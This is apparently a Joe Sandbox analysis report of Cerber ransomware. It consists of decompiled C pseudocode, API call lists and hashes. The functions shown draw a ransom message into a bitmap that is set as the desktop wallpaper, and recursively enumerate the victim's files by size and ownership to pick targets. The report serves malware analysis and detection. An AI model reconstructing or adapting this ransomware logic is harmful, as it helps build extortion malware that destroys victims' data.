                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E004066BB(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                                                        
                                                                                                                                                                                        				if(_a8 == 0x110) {
                                                                                                                                                                                        					 *( *(_a16 + 0x40)) = E0040AD18() & 0x000000ff; // executed
                                                                                                                                                                                        					PostMessageW(_a4, 0x111, 2, 0); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}




                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000002,00000000), ref: 004066E4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                        			E004089AC(signed int __edx, void* __eflags, char _a4) {
                                                                                                                                                                                        				struct HDC__* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                        				struct HDC__* _v36;
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				struct tagRECT _v56;
                                                                                                                                                                                        				void* _v60;
                                                                                                                                                                                        				void* _v64;
                                                                                                                                                                                        				struct tagRECT _v80;
                                                                                                                                                                                        				intOrPtr _v86;
                                                                                                                                                                                        				intOrPtr _v94;
                                                                                                                                                                                        				void _v96;
                                                                                                                                                                                        				int _v120;
                                                                                                                                                                                        				signed int _v122;
                                                                                                                                                                                        				short _v124;
                                                                                                                                                                                        				signed int _v128;
                                                                                                                                                                                        				void _v132;
                                                                                                                                                                                        				void _v136;
                                                                                                                                                                                        				int _v152;
                                                                                                                                                                                        				signed int _v156;
                                                                                                                                                                                        				void _v160;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                        				struct HDC__* _t101;
                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                        				struct HDC__* _t111;
                                                                                                                                                                                        				int _t114;
                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                        				int _t118;
                                                                                                                                                                                        				signed int _t123;
                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                        				WCHAR* _t167;
                                                                                                                                                                                        				void* _t169;
                                                                                                                                                                                        				signed char _t189;
                                                                                                                                                                                        				signed char _t191;
                                                                                                                                                                                        				int _t195;
                                                                                                                                                                                        				void* _t201;
                                                                                                                                                                                        				void* _t202;
                                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                                        				signed int _t210;
                                                                                                                                                                                        				signed int _t212;
                                                                                                                                                                                        				signed int _t214;
                                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                                        				signed int _t219;
                                                                                                                                                                                        				struct HDC__* _t221;
                                                                                                                                                                                        				int _t223;
                                                                                                                                                                                        				struct HDC__* _t230;
                                                                                                                                                                                        				void* _t236;
                                                                                                                                                                                        				long _t240;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t214 = __edx;
                                                                                                                                                                                        				_t99 = E00405905(0x40d738, 9, 0xf223c378);
                                                                                                                                                                                        				_t1 =  &_a4; // 0x40667b
                                                                                                                                                                                        				_t101 = E004031AF( *_t1, __eflags, _t99);
                                                                                                                                                                                        				_t221 = _t101;
                                                                                                                                                                                        				_v16 = _t221;
                                                                                                                                                                                        				_t259 = _t221;
                                                                                                                                                                                        				if(_t221 != 0) {
                                                                                                                                                                                        					_t104 = E004031AF(_t221, _t259, E00405905(0x40d76c, 0x10, 0x1f2f764e));
                                                                                                                                                                                        					_pop(_t201);
                                                                                                                                                                                        					_t101 = E00403253(_t104, _t259) | _t214;
                                                                                                                                                                                        					_t260 = _t101;
                                                                                                                                                                                        					if(_t101 != 0) {
                                                                                                                                                                                        						_push( &_v40);
                                                                                                                                                                                        						_t109 = E004031AF(_t221, _t260, E00405905(0x40d514, 4, 0x22a8cdeb));
                                                                                                                                                                                        						_t202 = _t201;
                                                                                                                                                                                        						_t101 = E004078F0(E004032B8(_t109, _t260), _t202, _t214);
                                                                                                                                                                                        						_v28 = _t101;
                                                                                                                                                                                        						if(_t101 != 0) {
                                                                                                                                                                                        							_t101 = GetDC(0);
                                                                                                                                                                                        							_t230 = _t101;
                                                                                                                                                                                        							_v36 = _t230;
                                                                                                                                                                                        							if(_t230 != 0) {
                                                                                                                                                                                        								_t111 = CreateCompatibleDC(_t230);
                                                                                                                                                                                        								_v12 = _t111;
                                                                                                                                                                                        								if(_t111 == 0) {
                                                                                                                                                                                        									L20:
                                                                                                                                                                                        									return ReleaseDC(0, _t230);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t223 = GetDeviceCaps(_t230, 8);
                                                                                                                                                                                        								_t114 = GetDeviceCaps(_t230, 0xa);
                                                                                                                                                                                        								_v24 = _t114;
                                                                                                                                                                                        								_t115 = CreateCompatibleBitmap(_t230, _t223, _t114);
                                                                                                                                                                                        								_v32 = _t115;
                                                                                                                                                                                        								_t264 = _t115;
                                                                                                                                                                                        								if(_t115 == 0) {
                                                                                                                                                                                        									L19:
                                                                                                                                                                                        									_t98 =  &_v12; // 0x40667b
                                                                                                                                                                                        									DeleteDC( *_t98);
                                                                                                                                                                                        									goto L20;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t9 =  &_v12; // 0x40667b
                                                                                                                                                                                        								_v40 = SelectObject( *_t9, _t115);
                                                                                                                                                                                        								_t118 = GetDeviceCaps(_t230, 0x5a);
                                                                                                                                                                                        								_t123 = MulDiv(E00403253(E004031AF(_v16, _t264, E00405905( &E0040D744, 4, 0x149d4cf6)), _t264), _t118, 0x48);
                                                                                                                                                                                        								_t125 = CreateFontW( ~_t123, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
                                                                                                                                                                                        								_v64 = _t125;
                                                                                                                                                                                        								_t265 = _t125;
                                                                                                                                                                                        								if(_t125 == 0) {
                                                                                                                                                                                        									L18:
                                                                                                                                                                                        									SelectObject(_v12, _v40);
                                                                                                                                                                                        									DeleteObject(_v32);
                                                                                                                                                                                        									_t230 = _v36;
                                                                                                                                                                                        									goto L19;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_v60 = SelectObject(_v12, _t125);
                                                                                                                                                                                        								SetBkColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d758, 0xa, 0xac908572)), _t265));
                                                                                                                                                                                        								SetTextColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d764, 5, 0xb1a3f726)), _t265));
                                                                                                                                                                                        								_t236 = _v24;
                                                                                                                                                                                        								_v56.left = 0;
                                                                                                                                                                                        								_v56.top = 0;
                                                                                                                                                                                        								_v56.right = _t223;
                                                                                                                                                                                        								_v56.bottom = _t236;
                                                                                                                                                                                        								FillRect(_v12,  &_v56, GetStockObject(2));
                                                                                                                                                                                        								_t143 = _t236 * _t223;
                                                                                                                                                                                        								_t207 = 0xa;
                                                                                                                                                                                        								_t144 = _t143 / _t207;
                                                                                                                                                                                        								_t216 = _t143 % _t207;
                                                                                                                                                                                        								if(_t144 <= 0) {
                                                                                                                                                                                        									L11:
                                                                                                                                                                                        									_v80.left = 0;
                                                                                                                                                                                        									_v80.top = 0;
                                                                                                                                                                                        									_v80.right = _t223;
                                                                                                                                                                                        									_v80.bottom = _t236;
                                                                                                                                                                                        									DrawTextA(_v12, _v28, 0xffffffff,  &_v80, 0x411);
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									_v56.top = (_v56.bottom - _t216 >> 1) - (_v80.bottom - _t216 >> 1);
                                                                                                                                                                                        									DrawTextA(_v12, _v28, 0xffffffff,  &_v56, 0x11);
                                                                                                                                                                                        									GetObjectW(_v32, 0x18,  &_v160);
                                                                                                                                                                                        									_t210 = 9;
                                                                                                                                                                                        									memset( &_v132, 0, _t210 << 2);
                                                                                                                                                                                        									_t159 = _v156;
                                                                                                                                                                                        									_t212 = _v152;
                                                                                                                                                                                        									_v132 = _t159;
                                                                                                                                                                                        									_v124 = 1;
                                                                                                                                                                                        									_t219 = 0x20;
                                                                                                                                                                                        									_v122 = _t219;
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									_t240 = ((_t219 & 0x0000001f) + (_t159 << 5) + 0x1f >> 5) * _t212 << 2;
                                                                                                                                                                                        									_v136 = 0x28;
                                                                                                                                                                                        									_v128 = _t212;
                                                                                                                                                                                        									_v120 = 0;
                                                                                                                                                                                        									_t162 = E004053BD(_t212);
                                                                                                                                                                                        									_v24 = _t162;
                                                                                                                                                                                        									if(_t162 != 0) {
                                                                                                                                                                                        										GetDIBits(_v36, _v32, 0, _v152, _t162,  &_v136, 0);
                                                                                                                                                                                        										_t167 = E00404D43(E0040591C(0x40d780, 4, 0x91fa4d45));
                                                                                                                                                                                        										_v28 = _t167;
                                                                                                                                                                                        										if(_t167 != 0) {
                                                                                                                                                                                        											_t169 = CreateFileW(_t167, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                        											_v16 = _t169;
                                                                                                                                                                                        											if(_t169 != 0xffffffff) {
                                                                                                                                                                                        												asm("stosd");
                                                                                                                                                                                        												asm("stosd");
                                                                                                                                                                                        												asm("stosd");
                                                                                                                                                                                        												_v94 = _t240 + 0x36;
                                                                                                                                                                                        												_v96 = 0x4d42;
                                                                                                                                                                                        												_v86 = 0x36;
                                                                                                                                                                                        												_v20 = 0;
                                                                                                                                                                                        												WriteFile(_v16,  &_v96, 0xe,  &_v20, 0);
                                                                                                                                                                                        												WriteFile(_v16,  &_v136, 0x28,  &_v20, 0);
                                                                                                                                                                                        												WriteFile(_v16, _v24, _t240,  &_v20, 0);
                                                                                                                                                                                        												CloseHandle(_v16);
                                                                                                                                                                                        												SystemParametersInfoW(0x14, 0, _v28, 3);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											E00405463(_v28);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										E00405463(_v24);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									SelectObject(_v12, _v60);
                                                                                                                                                                                        									DeleteObject(_v64);
                                                                                                                                                                                        									goto L18;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_v20 = _t144;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_v16 = (E004063E1(0xff) & 0x000000ff) << 8;
                                                                                                                                                                                        									_t189 = E004063E1(0xff);
                                                                                                                                                                                        									_t191 = E004063E1(0xff);
                                                                                                                                                                                        									_t195 = E004063E1(_v56.bottom);
                                                                                                                                                                                        									SetPixel(_v12, E004063E1(_v56.right), _t195, _t191 & 0x000000ff | (_t189 & 0x000000ff | _v16) << 0x00000008);
                                                                                                                                                                                        									_t36 =  &_v20;
                                                                                                                                                                                        									 *_t36 = _v20 - 1;
                                                                                                                                                                                        								} while ( *_t36 != 0);
                                                                                                                                                                                        								_t236 = _v24;
                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t101;
                                                                                                                                                                                        			}





























































                                                                                                                                                                                        0x00408c82
                                                                                                                                                                                        0x00408c84
                                                                                                                                                                                        0x00408c8a
                                                                                                                                                                                        0x00408c91
                                                                                                                                                                                        0x00408c94
                                                                                                                                                                                        0x00408c9d
                                                                                                                                                                                        0x00408c9e
                                                                                                                                                                                        0x00408ca5
                                                                                                                                                                                        0x00408cb2
                                                                                                                                                                                        0x00408cb7
                                                                                                                                                                                        0x00408cc1
                                                                                                                                                                                        0x00408cc4
                                                                                                                                                                                        0x00408cc7
                                                                                                                                                                                        0x00408ccc
                                                                                                                                                                                        0x00408cd1
                                                                                                                                                                                        0x00408ced
                                                                                                                                                                                        0x00408d09
                                                                                                                                                                                        0x00408d0e
                                                                                                                                                                                        0x00408d13
                                                                                                                                                                                        0x00408d2a
                                                                                                                                                                                        0x00408d30
                                                                                                                                                                                        0x00408d36
                                                                                                                                                                                        0x00408d3d
                                                                                                                                                                                        0x00408d3e
                                                                                                                                                                                        0x00408d3f
                                                                                                                                                                                        0x00408d43
                                                                                                                                                                                        0x00408d4c
                                                                                                                                                                                        0x00408d5d
                                                                                                                                                                                        0x00408d64
                                                                                                                                                                                        0x00408d67
                                                                                                                                                                                        0x00408d7e
                                                                                                                                                                                        0x00408d90
                                                                                                                                                                                        0x00408d99
                                                                                                                                                                                        0x00408da7
                                                                                                                                                                                        0x00408da7
                                                                                                                                                                                        0x00408db0
                                                                                                                                                                                        0x00408db0
                                                                                                                                                                                        0x00408db8
                                                                                                                                                                                        0x00408db8
                                                                                                                                                                                        0x00408dc3
                                                                                                                                                                                        0x00408dcc
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00408dcc
                                                                                                                                                                                        0x00408bbd
                                                                                                                                                                                        0x00408bc0
                                                                                                                                                                                        0x00408bd2
                                                                                                                                                                                        0x00408bd7
                                                                                                                                                                                        0x00408bea
                                                                                                                                                                                        0x00408bf8
                                                                                                                                                                                        0x00408c0a
                                                                                                                                                                                        0x00408c10
                                                                                                                                                                                        0x00408c10
                                                                                                                                                                                        0x00408c10
                                                                                                                                                                                        0x00408c15
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00408c15
                                                                                                                                                                                        0x00408a5c
                                                                                                                                                                                        0x00408a48
                                                                                                                                                                                        0x00408a0b
                                                                                                                                                                                        0x00408dff

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                          • Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
                                                                                                                                                                                          • Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938
                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00408A4F
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00408A63
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00408A77
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408A82
                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408A8E
                                                                                                                                                                                        • SelectObject.GDI32({f@,00000000), ref: 00408AA3
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00408AB1
                                                                                                                                                                                        • MulDiv.KERNEL32(00000000), ref: 00408ADE
                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408B0C
                                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00408B21
                                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00408B53
                                                                                                                                                                                          • Part of subcall function 00403253: StrToInt64ExA.SHLWAPI(?,00000000,?,F5C6A5FE,?,?,?,00402CB1,?,?,?,00000000,00000000,00406B45,?,00000000), ref: 004032A9
                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00408B82
                                                                                                                                                                                        • GetStockObject.GDI32(00000002), ref: 00408B99
                                                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 00408BA7
                                                                                                                                                                                        • SetPixel.GDI32(?,00000000,00000000,?), ref: 00408C0A
                                                                                                                                                                                        • DrawTextA.USER32(?,?,000000FF,?,00000411), ref: 00408C35
                                                                                                                                                                                        • DrawTextA.USER32(?,?,000000FF,?,00000011), ref: 00408C60
                                                                                                                                                                                        • GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408C72
                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00408CED
                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00408D2A
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 00408D67
                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000028,00000028,?,00000000), ref: 00408D7E
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00408D90
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00408D99
                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00408DA7
                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00408DC3
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00408DCC
                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00408DD8
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00408DE1
                                                                                                                                                                                        • DeleteDC.GDI32({f@), ref: 00408DED
                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00408DF5
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$CreateFileSelect$CapsDeleteDeviceTextWrite$ColorCompatibleDraw$BitmapBitsCloseFillFontHandleInfoInt64ParametersPixelRectReleaseStockSystemlstrcmpilstrlen
                                                                                                                                                                                        • String ID: {f@${f@
                                                                                                                                                                                        • API String ID: 2080757576-3352485320
                                                                                                                                                                                        • Opcode ID: d6a56e6b6532c6585c8755897e461db2777add79945ba90acb89a99c47189ff0
                                                                                                                                                                                        • Instruction ID: 2856dbb673b69ec4cade2b047b667f652ddefbff5f4d6f99c4febc8329f0e424
                                                                                                                                                                                        • Opcode Fuzzy Hash: d6a56e6b6532c6585c8755897e461db2777add79945ba90acb89a99c47189ff0
                                                                                                                                                                                        • Instruction Fuzzy Hash: F4C19FB2D00218BFDB10AFA5DD45AAEBBB8EF48311F10457AF601F72E1DB7849058B59
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                        			E0040A419(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, char* _a16) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v612;
                                                                                                                                                                                        				short _v1132;
                                                                                                                                                                                        				struct _SECURITY_DESCRIPTOR _v2156;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				int _t55;
                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                        				WCHAR* _t70;
                                                                                                                                                                                        				WCHAR* _t72;
                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                        				char* _t106;
                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                        				int _t108;
                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t105 = _a4;
                                                                                                                                                                                        				if(_t105 == 0) {
                                                                                                                                                                                        					SetFileAttributesW(_a8, GetFileAttributesW(_a8) | 0x00002000);
                                                                                                                                                                                        					_t54 = E0040591C( &E0040D8B0, 1, 0x126191fd);
                                                                                                                                                                                        					_t110 = _t109 + 0xc;
                                                                                                                                                                                        					_t55 = E00406390(_t54,  &_v1132, _a8);
                                                                                                                                                                                        					_pop(_t102);
                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                        					if(_t55 != 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t55 = E00409381(__ecx, _t105, 0);
                                                                                                                                                                                        					_t108 = _t55;
                                                                                                                                                                                        					if(_t108 != 0) {
                                                                                                                                                                                        						_push(_a8);
                                                                                                                                                                                        						_push(_t108);
                                                                                                                                                                                        						wsprintfW( &_v1132, E0040591C(0x40d7dc, 5, 0x3260f07e));
                                                                                                                                                                                        						_t110 = _t109 + 0x1c;
                                                                                                                                                                                        						E00405463(_t108);
                                                                                                                                                                                        						_t55 = GetFileAttributesW( &_v1132);
                                                                                                                                                                                        						if((_t55 & 0x00000002) == 0) {
                                                                                                                                                                                        							_t102 =  &_v8;
                                                                                                                                                                                        							_v8 = 0x400;
                                                                                                                                                                                        							if(GetFileSecurityW( &_v1132, 1,  &_v2156, 0x400,  &_v8) == 0 || GetSecurityDescriptorOwner( &_v2156,  &_v12,  &_v16) == 0) {
                                                                                                                                                                                        								L6:
                                                                                                                                                                                        								 *((char*)(_t105 + 5)) = 1;
                                                                                                                                                                                        								SetFileAttributesW( &_v1132, GetFileAttributesW( &_v1132) | 0x00002000);
                                                                                                                                                                                        								lstrcatW( &_v1132, 0x40cec8);
                                                                                                                                                                                        								L8:
                                                                                                                                                                                        								_t106 = _a16;
                                                                                                                                                                                        								if( *((char*)(_t106 + 1)) != 0) {
                                                                                                                                                                                        									L10:
                                                                                                                                                                                        									_t55 = FindFirstFileW( &_v1132,  &_v612);
                                                                                                                                                                                        									_v8 = _t55;
                                                                                                                                                                                        									if(_t55 != 0xffffffff) {
                                                                                                                                                                                        										_t107 = 0;
                                                                                                                                                                                        										while(WaitForSingleObject( *0x42f834, 0) != 0) {
                                                                                                                                                                                        											if(E004063BC( &(_v612.cFileName)) != 0 || (_v612.dwFileAttributes & 0x00000400) != 0) {
                                                                                                                                                                                        												L25:
                                                                                                                                                                                        												if(FindNextFileW(_v8,  &_v612) != 0) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												if(_t107 != 0) {
                                                                                                                                                                                        													L17:
                                                                                                                                                                                        													CharLowerBuffW( &(_v612.cFileName), lstrlenW( &(_v612.cFileName)));
                                                                                                                                                                                        													if((_v612.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                        														_t68 = _v612.nFileSizeHigh;
                                                                                                                                                                                        														_t102 = _v612.nFileSizeLow;
                                                                                                                                                                                        														__eflags = _t68 -  *0x42f7ac; // 0x0
                                                                                                                                                                                        														if(__eflags < 0) {
                                                                                                                                                                                        															goto L25;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														if(__eflags > 0) {
                                                                                                                                                                                        															L22:
                                                                                                                                                                                        															__eflags =  *_t106;
                                                                                                                                                                                        															if( *_t106 == 0) {
                                                                                                                                                                                        																L24:
                                                                                                                                                                                        																_t70 = _a12(_t107,  &_v612, _t106);
                                                                                                                                                                                        																_t110 = _t110 + 0xc;
                                                                                                                                                                                        																__eflags = _t70;
                                                                                                                                                                                        																if(_t70 == 0) {
                                                                                                                                                                                        																	break;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																goto L25;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															_t72 = StrChrW( &(_v612.cFileName), 0x2e);
                                                                                                                                                                                        															__eflags = _t72;
                                                                                                                                                                                        															if(_t72 == 0) {
                                                                                                                                                                                        																goto L25;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															goto L24;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														__eflags = _t102 -  *0x42f7a8; // 0x0
                                                                                                                                                                                        														if(__eflags < 0) {
                                                                                                                                                                                        															goto L25;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													Sleep(1);
                                                                                                                                                                                        													E0040A419(_t102, _t107,  &(_v612.cFileName), _a12, _t106);
                                                                                                                                                                                        													_t110 = _t110 + 0x10;
                                                                                                                                                                                        													goto L25;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t107 = E0040A25A(lstrlenW(_a8), _t102, _a4, _a8, _t106);
                                                                                                                                                                                        												_t110 = _t110 + 0xc;
                                                                                                                                                                                        												if(_t107 == 0) {
                                                                                                                                                                                        													break;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L17;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										return FindClose(_v8);
                                                                                                                                                                                        									}
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t55 = E004094DB( &_v1132);
                                                                                                                                                                                        									_pop(_t102);
                                                                                                                                                                                        									if(_t55 == 0) {
                                                                                                                                                                                        										goto L10;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t55 = EqualSid(0x42fa80, _v12);
                                                                                                                                                                                        								if(_t55 == 0) {
                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t55;
                                                                                                                                                                                        			}






















                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a651
                                                                                                                                                                                        0x0040a65b
                                                                                                                                                                                        0x0040a65b
                                                                                                                                                                                        0x0040a65e
                                                                                                                                                                                        0x0040a673
                                                                                                                                                                                        0x0040a67c
                                                                                                                                                                                        0x0040a67f
                                                                                                                                                                                        0x0040a682
                                                                                                                                                                                        0x0040a684
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a684
                                                                                                                                                                                        0x0040a669
                                                                                                                                                                                        0x0040a66f
                                                                                                                                                                                        0x0040a671
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a671
                                                                                                                                                                                        0x0040a653
                                                                                                                                                                                        0x0040a659
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a659
                                                                                                                                                                                        0x0040a621
                                                                                                                                                                                        0x0040a633
                                                                                                                                                                                        0x0040a638
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a638
                                                                                                                                                                                        0x0040a5ee
                                                                                                                                                                                        0x0040a5f0
                                                                                                                                                                                        0x0040a5f5
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a5f5
                                                                                                                                                                                        0x0040a5bd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a6a1
                                                                                                                                                                                        0x0040a563
                                                                                                                                                                                        0x0040a56a
                                                                                                                                                                                        0x0040a56f
                                                                                                                                                                                        0x0040a572
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a572
                                                                                                                                                                                        0x0040a4c7
                                                                                                                                                                                        0x0040a4cf
                                                                                                                                                                                        0x0040a4d7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040a4d7
                                                                                                                                                                                        0x0040a4ac
                                                                                                                                                                                        0x0040a481
                                                                                                                                                                                        0x0040a43e
                                                                                                                                                                                        0x0040a6ab

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wsprintfW.USER32 ref: 0040A464
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0040A479
                                                                                                                                                                                        • GetFileSecurityW.ADVAPI32(?,00000001,?,00000400,?), ref: 0040A4A4
                                                                                                                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
                                                                                                                                                                                        • EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
